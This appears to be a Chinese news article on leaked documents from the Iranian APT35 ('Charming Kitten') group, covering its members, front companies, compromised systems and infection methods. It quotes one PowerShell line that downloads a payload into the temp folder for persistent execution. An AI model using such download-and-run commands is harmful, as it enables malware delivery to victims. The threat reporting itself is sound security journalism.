Mimicat组织数据泄露详情:核心成员、空壳公司与千台受控系统曝光
安全研究员 Nariman Gharib 表示,泄露文件中的任务清单揭示,"迷人小猫"(Charming Kitten)的恶意软件主要瞄准外交、能源与民间社会组织网络。
免费影视、动漫、音乐、游戏、小说资源长期稳定更新! 👉 点此立即查看 👈
据披露,以伊朗为背景的黑客组织"迷人小猫"(又称 APT35)近期泄露的内部文件,曝光了该组织核心成员、用于掩护的空壳公司以及遍布五大洲的数千台受控系统。

长期网络间谍行动体系
文件显示,隶属于伊朗伊斯兰革命卫队情报组织的第40部门,长期开展结合网络间谍、监控与目标定位的综合入侵行动。被盗的仪表盘数据和工资记录首次将具体黑客活动与实名操作人员关联,而不再是以往匿名的威胁标签。
泄露资料进一步揭示了支撑这些行动的财务体系,包括"姐妹团队"和"兄弟团队"的工资单,以及通过伪装成普通IT或云服务供应商的空壳公司流转的资金。受控系统涉及VPN网关、邮件服务器以及用于操纵已植入政府机构、高校和电信供应商内部的恶意软件的C2节点,完整呈现了资金流、管理链与恶意软件的三位一体运作模式。
攻击目标与感染途径
安全研究员 Nariman Gharib 指出,泄露材料中包含的任务清单表明,"迷人小猫"的恶意软件专门针对外交、能源和公民社会网络。攻击通常通过鱼叉式钓鱼邮件、伪造登录页面或伪装成会议邀请/工资单/政策文件的恶意文档附件传播。
当用户打开诱饵文件并启用脚本或输入凭证后,攻击者便获得初始立足点,最终实现设备完全控制与数据窃取。泄露的仪表盘日志显示,受害者主机的信标会通过HTTPS定期回连伊朗控制的服务器,这些通信往往隐藏在看似正常的网络流量中。

这些受控主机包括邮件网关、域控制器和用户笔记本电脑,使攻击者能访问邮件系统、文件共享和身份认证系统。泄露报告按地区和行业分类的感染机器集群,凸显了该行动的广泛影响。
感染机制与C2架构
感染通常始于用户打开宏或HTML诱饵后,在内存运行的小型加载器。简短的PowerShell命令会从固定但隐藏的URL获取主载荷,相关技术细节已在"迷人小猫"工具的完整分析报告中披露:
Invoke-WebRequest $u -OutFile "$env:TEMP\\\\svc.exe"
泄露日志显示,该二进制文件会作为计划任务持续运行,在伪装成正常Windows活动的同时维持稳定访问。
游乐网为非赢利性网站,所展示的游戏/软件/文章内容均来自于互联网或第三方用户上传分享,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系youleyoucom@outlook.com。
同类文章
CISA警告:F5 BIG-IP漏洞正遭活跃利用,需立即防护
F5公司已发布解决方案指南,强烈建议各组织立即遵循最新缓解步骤。 美国网络安全和基础设施安全局(CISA)已将新披露的F5 BIG-IP系统漏洞纳入其已知已利用漏洞(KEV)目录,警告该漏洞正在真实
陆尚舒适DG版上市:22.99万起售,插混纯电续航142公里
上汽通用汽车近日宣布,别克GL8 PHEV系列迎来新成员——陆尚舒适DG版正式登陆市场,最新定价为22 99万元。这一新车型的推出,旨在进一步丰富消费者的选择,并降低中大型插电式混合动力MPV的购车
广汽丰田铂智7热销:15.68万豪华五大件引爆订单
在今日举行的广汽丰田新品发布会上,备受瞩目的铂智7纯电动轿车正式亮相。最新数据显示,自3月5日启动预售以来,该车型已收获超过1万台订单,展现出强劲的市场号召力。作为广汽丰田首款中大型纯电动轿车,铂智
中微公司2026全球供应商大会:同芯筑梦,共攀巅峰
2026年3月28日,中微半导体设备(上海)股份有限公司(以下简称“中微公司”,证券代码“688012”)全球供应商大会在上海临港隆重举行。本次大会以“同芯筑梦,共攀巅峰”为主题,汇聚来自全球各地的
国产六万千瓦混合动力电推系统完成飞行验证,无人机航时静音双突破
四川天府轻型动力科技有限公司在航空动力领域取得突破性进展,其自主研发的60千瓦混合动力电推进系统成功完成飞行演示验证,标志着我国小型无人机动力技术迈入新阶段。该系统采用 "油电协同 "的增程式架构,通过
- 日榜
- 周榜
- 月榜
相关攻略
2015-03-10 11:25
2015-03-10 11:05
2021-08-04 13:30
2015-03-10 11:22
2015-03-10 12:39
2022-05-16 18:57
2025-05-23 13:43
2025-05-23 14:01
热门教程
- 游戏攻略
- 安卓教程
- 苹果教程
- 电脑教程

